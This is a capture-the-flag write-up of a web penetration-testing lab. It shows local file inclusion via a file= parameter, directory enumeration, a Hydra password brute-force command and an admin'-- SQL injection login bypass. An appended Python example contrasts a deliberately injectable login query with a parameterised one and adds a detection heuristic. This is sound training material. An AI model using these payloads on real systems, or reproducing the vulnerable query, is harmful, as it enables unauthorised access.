Welcome to our eJPT — 4.1 CTF 1 Web Application Penetration Testing lab.
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.
Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.
Useful wordlists:
/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
Tools:
- Nmap
- Dirb, gobuster
- Hydra
Step 1: In this step open the lab link to access the Kali GUI instance.

Step 2: In this step check if the target machine is reachable:
Command:
ping -c 4 target.ine.local
Step 3: In this step run an Nmap scan.
Command:
nmap -sV target.ine.local
Flag 1: Sometimes, important files are hidden in plain sight. Check the root ('/') directory for a file named 'flag.txt' that might hold the key to the first flag.
Step 4: In this case a web server is running on port 80 and the page shows a 'Select file' button. I initially tried changing the filename in the URL from file1.txt to flag.txt but that failed.

What worked: perform an LFI (Local File Inclusion) by changing the file= parameter to point at an absolute path on the filesystem and read the flag file in the root directory.
Example payload (used in the URL):

?file=/flag.txt
Flag 2: Explore the structure of the server's directories. Enumeration might reveal hidden treasures.
Step 5: In this step explore the server's directory structure — enumeration often uncovers hidden files or directories.
What I did: ran a directory discovery scan (e.g., dirb/gobuster) against the target.
Command:
dirb http://target.ine.local /usr/share/wordlists/dirb/common.txt
Step 6: That revealed a directory named /secured.

http://target.ine.local/secured/flag.txt
Flag 3: The login form seems a bit weak. Trying out different combinations might just reveal the next flag.
Step 7: In this step navigate to the login page and identify the form action and field names. Use Hydra (or another brute-force tool) with appropriate username and password lists (e.g., the wordlists listed above) against the http-post-form module. Example Hydra command:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /root/Desktop/wordlists/100-common-passwords.txt target.ine.local http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username or password"
When valid credentials are found, log in with them and retrieve the third flag from the account/dashboard.


Flag 4: The login form behaves oddly with unexpected inputs. Think of injection techniques to access the 'admin' account and find the flag.
Step 8: In this step the hint points to SQL injection. Enter the username:
admin'--
and any value for the password field. Submitting this input bypasses authentication: the '--' turns the remainder of the SQL WHERE clause into a comment, so the password check is never evaluated, and the query matches the admin row. This grants access to the admin account, where the final flag can be found.
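To show why the admin'-- input above works and what the fixed login query looks like, here is an added Python example (not part of the lab or the original post) using an in-memory SQLite database with constructed sample credentials; the table name, column names and password are assumptions:

```python
import sqlite3


def make_db():
    """Build a throwaway in-memory users table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password kept only for brevity; real apps store a salted hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that builds the SQL text from user input.

    With username admin'-- the query becomes
    SELECT username FROM users WHERE username = 'admin'--' AND password = '...'
    and everything after -- is a comment, so the password is never checked.
    """
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same check with bound parameters: input is data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def looks_like_sqli(value):
    """Cheap detection heuristic for login logs: quote followed by a comment
    or tautology marker. Useful for alerting, not a substitute for the fix."""
    v = value.lower()
    return "'" in v and any(m in v for m in ("--", "/*", " or "))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin'--", "anything"))  # admin
    print("hardened:  ", login_hardened(db, "admin'--", "anything"))    # None
    print("flagged:   ", looks_like_sqli("admin'--"))                    # True
```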

Thank you for reading!
HAPPY CTF HACKING!